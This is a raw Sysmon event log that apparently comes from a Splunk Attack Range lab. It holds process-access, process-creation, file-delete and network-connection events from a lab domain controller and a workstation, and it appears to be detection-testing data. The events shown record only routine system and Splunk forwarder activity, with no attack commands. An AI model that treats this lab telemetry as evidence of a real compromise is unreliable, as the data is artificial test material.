10:52:43.005{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:43.005{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:43.005{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11FC-6216-6504-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216953Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216952Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216951Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216950Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216949Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216948Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216947Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-11FC-6216-6504-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000216946Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.987{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-11FC-6216-6504-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000216945Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.988{4F8D34B0-11FC-6216-6504-000000003902}956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000216944Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:44.581{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA4D197C6D4B8D0CF21ECE9294733DCD,SHA256=03AF1A50AC2AC5963AF10DB45F0C0AE061CA836ACB14A516A1588C51014A96E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.971{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000289048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.952{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1500-000000003802}1092C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.871{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.836{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.372{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83A73857E3395C9FA4F24E3705E0172E,SHA256=EF02883C93E2F665EB7D175A8E16A5F6D3C822B8732FA42EDC03B7CADF7AE71F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:42.325{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local60872- 354300x8000000000000000289043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:41.558{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53502-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000289042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:41.558{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53502-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 10341000x8000000000000000216972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.863{4F8D34B0-11FD-6216-6604-000000003902}33123512C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000216971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26821ED5366A8FC69121042E8CED4D30,SHA256=C3F19CF1B5DA37430BDE9E897479E0C887AF50253E7E9E14E0C68236EBC3FDEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000216970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-11FD-6216-6604-000000003902}3312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:45.659{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 